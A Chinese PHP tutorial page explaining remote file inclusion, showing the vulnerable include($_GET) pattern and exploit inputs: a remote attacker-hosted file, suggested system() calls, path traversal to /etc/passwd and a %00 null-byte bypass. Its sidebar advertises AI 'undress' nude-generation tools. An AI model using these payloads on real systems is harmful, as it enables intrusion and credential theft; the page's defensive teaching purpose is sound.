是什么造成PHP远程文件包含漏洞产生
对于初级PHP程序员来说,对于PHP的安全性还不能完全掌握。首先我们需要了解致使程序漏洞的原理。下面我们就来介绍一下PHP远程文件包含漏洞的产生原因。
首先的问题是,什么才是”远程文件包含漏洞“?简要的回答是服务器通过PHP的任意文件包含过滤不严,从而去执行一个恶意文件,这是个程序员过滤上的问题,请记住,所有的cgi程序都有这样的bug。
1.找出PHP远程文件包含漏洞bug:
为了发现目标,我们首先要知道包含两个字的含义,在所有语言里(大多数)都有这种方法包含任意的文件。在PHP里,我们使用include()函数,它的工作流程:
如果你在Main.PHP里包含include1.PHP,我将这样写include("include1.PHP").不是很科学,但你要知道其中的道理。
我们先看这个,当用户输入通过后就包含文件,也就是
<ol class="dp-c">
<li class="alt"><span><span class="keyword">if</span><span> (</span><span class="vars">$_GET</span><span> <br>
) { </span></span></li>
<li>
<span class="keyword">include</span><span> </span><span class="vars">$_GET</span><span> <br>
; </span>
</li>
<li class="alt">
<span>} </span><span class="keyword">else</span><span> { </span>
</li>
<li>
<span class="keyword">include</span><span> </span><span class="string">"home.PHP"</span><span>; </span>
</li>
<li class="alt"><span>} </span></li>
</ol>这种结构在动态网站里是常见的,问题是它允许这样 [url]hxxp://www.target.com/explame.PHP?page=main.PHP[/url] 或者[url]hxxp://www.target.com/explame.PHP?page=downloads.PHP[/url]来查看。无论如何,如果你的程序里有这样的bug也很悲哀了,只能怪你,尽管只是一句过滤的问题,但就是这一句过滤就有了Script hacker.在zone-h.org的调查里,文件包含的攻击率占到9.4%,足够我们引起重视,而且它也不是一两天的问题,几年前就有了,但到了今天,一批一批程序员依旧走老路重走,所以就有了这篇文章,在2004年写这样的文章已经老掉牙,但我还是要写,毕竟牢骚能让人收益的时候就不叫牢骚了。
2.测试
这里有个远程文件包含的例子,目的只有一个,为了你的程序安全,我们来看具体的
<ol class="dp-xml"> <li class="alt"><span><span>[url]hxxp://www.target.com/explame.PHP?</span><span class="attribute">page</span><span>=</span><span class="attribute-value">zizzy</span><span>[/url] </span></span></li> <li><span> </span></li> <li class="alt"><span>Warning: main(zizzy): failed to open stream: No such file or directory </span></li> <li><span> </span></li> <li class="alt"><span>in /var/www/htdocs/index.PHP on line 3 </span></li> <li><span> </span></li> <li class="alt"><span>Warning: main(): Failed opening 'zizzy' for inclusion </span></li> <li><span> </span></li> <li class="alt"> <span>(</span><span class="attribute">include_path</span><span>=</span><span class="attribute-value">'.:/usr/local/lib/PHP'</span><span>) in /var/www/htdocs/index.PHP on line 3 </span> </li> </ol>
PHP输出的这些错误信息告诉我们,程序去包含文件/var/www/htdocs/zizzy,但没找到,看见了吧,No such file or directory没这样的文件,现在理解PHP远程文件包含漏洞了吧。
3.利用
PHP确实很好,可以远程调用文件,那我创建一个yeah.txt,放在我的站上[url]hxxp://www.mysite.com/yeah.txt.[/url]内容这样
<ol class="dp-c"> <li class="alt"><span><span></span></span></li> <li> <span class="func">echo</span><span> </span><span class="string">"Wow,test!"</span><span>; </span> </li> <li class="alt"><span>?> </span></li> </ol>
那么
<ol class="dp-xml"><li class="alt"><span><span>[url]hxxp://www.target.com/explame.PHP?pa...e.com/yeah.txt[/url] </span></span></li></ol>
回显Wow,test!,这样就执行了。读取config.PHP也不难吧,里面放了mysql密码啊。把yeah.txt写成看看,写成system()去试试,有什么感想,在过分点,这样提交page=../../../../../../../etc /passwd。知道什么叫真正的包含了吧。
4.另一种PHP远程文件包含漏洞的原理
有时程序员换种写法,写成这样,限制了包含范围
<ol class="dp-c">
<li class="alt"><span><span class="keyword">if</span><span> (</span><span class="vars">$_GET</span><span> <br>
) { </span></span></li>
<li>
<span class="keyword">include</span><span> </span><span class="string">"$_GET <br>
.PHP"</span><span>; </span>
</li>
<li class="alt"><span>} </span></li>
<li>
<span class="keyword">else</span><span> </span>
</li>
<li class="alt"><span>{ </span></li>
<li>
<span class="keyword">include</span><span> </span><span class="string">"home.PHP"</span><span>; </span>
</li>
<li class="alt"><span>} </span></li>
</ol>我们提交
<ol class="dp-xml"> <li class="alt"><span><span>[url]hxxp://www.target.com/explame.PHP?pa...e.com/yeah.txt[/url] </span></span></li> <li><span> </span></li> <li class="alt"><span>Warning: main([url]hxxp://www.mysite.com/yeah.txt.PHP[/url]): failed to open stream: </span></li> <li><span> </span></li> <li class="alt"><span>hxxp request failed! hxxp/1.1 404 Not Found in /var/www/htdocs/explame.PHP on line 3 </span></li> <li><span> </span></li> <li class="alt"><span>Warning: main(): Failed opening 'hxxp://www.mysite.com/yeah.txt.PHP' for inclusion </span></li> <li><span> </span></li> <li class="alt"> <span>(</span><span class="attribute">include_path</span><span>=</span><span class="attribute-value">'.:/usr/local/lib/PHP'</span><span>) in /var/www/htdocs/explame.PHP on line 3 </span> </li> </ol>
包含失败了,限制了后缀名为PHP,把mysite.com的yeah.txt改为yeah.PHP,然后照样执行。那passwd怎么办?
<ol class="dp-xml"> <li class="alt"><span><span>Warning: main(../../../../../../../etc/passwd.PHP): failed to open stream: hxxp request </span></span></li> <li><span> </span></li> <li class="alt"><span>failed! hxxp/1.1 404 Not Found in /var/www/htdocs/explame.PHP on line 3 </span></li> <li><span> </span></li> <li class="alt"><span>Warning: main(): Failed opening '../../../../../../../etc/passwd.PHP' for inclusion </span></li> <li><span> </span></li> <li class="alt"> <span>(</span><span class="attribute">include_path</span><span>=</span><span class="attribute-value">'.:/usr/local/lib/PHP'</span><span>) in /var/www/htdocs/explame.PHP on line 3 </span> </li> </ol>
在这里使用个NUL字符,也就是%00来跳过检测
<ol class="dp-xml"><li class="alt"><span><span>[url]hxxp://www.target.com/explame.PHP?pa.../etc/passwd%00[/url] </span></span></li></ol>
看见了吧。
包含文件时最好指定好包含哪一个文件,或者过滤好提交的的变量,这也就是这篇PHP远程文件包含漏洞文章的目的,不是写给hacking的人看,而是写给那些初涉程序员的人,这样的文章网上很多,只要有人受益,也就达到目的了。
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
CakePHP Project Configuration
Sep 10, 2024 pm 05:25 PM
In this chapter, we will understand the Environment Variables, General Configuration, Database Configuration and Email Configuration in CakePHP.
PHP 8.4 Installation and Upgrade guide for Ubuntu and Debian
Dec 24, 2024 pm 04:42 PM
PHP 8.4 brings several new features, security improvements, and performance improvements with healthy amounts of feature deprecations and removals. This guide explains how to install PHP 8.4 or upgrade to PHP 8.4 on Ubuntu, Debian, or their derivati
CakePHP Date and Time
Sep 10, 2024 pm 05:27 PM
To work with date and time in cakephp4, we are going to make use of the available FrozenTime class.
CakePHP File upload
Sep 10, 2024 pm 05:27 PM
To work on file upload we are going to use the form helper. Here, is an example for file upload.
CakePHP Routing
Sep 10, 2024 pm 05:25 PM
In this chapter, we are going to learn the following topics related to routing ?
Discuss CakePHP
Sep 10, 2024 pm 05:28 PM
CakePHP is an open-source framework for PHP. It is intended to make developing, deploying and maintaining applications much easier. CakePHP is based on a MVC-like architecture that is both powerful and easy to grasp. Models, Views, and Controllers gu
CakePHP Creating Validators
Sep 10, 2024 pm 05:26 PM
Validator can be created by adding the following two lines in the controller.
How To Set Up Visual Studio Code (VS Code) for PHP Development
Dec 20, 2024 am 11:31 AM
Visual Studio Code, also known as VS Code, is a free source code editor — or integrated development environment (IDE) — available for all major operating systems. With a large collection of extensions for many programming languages, VS Code can be c
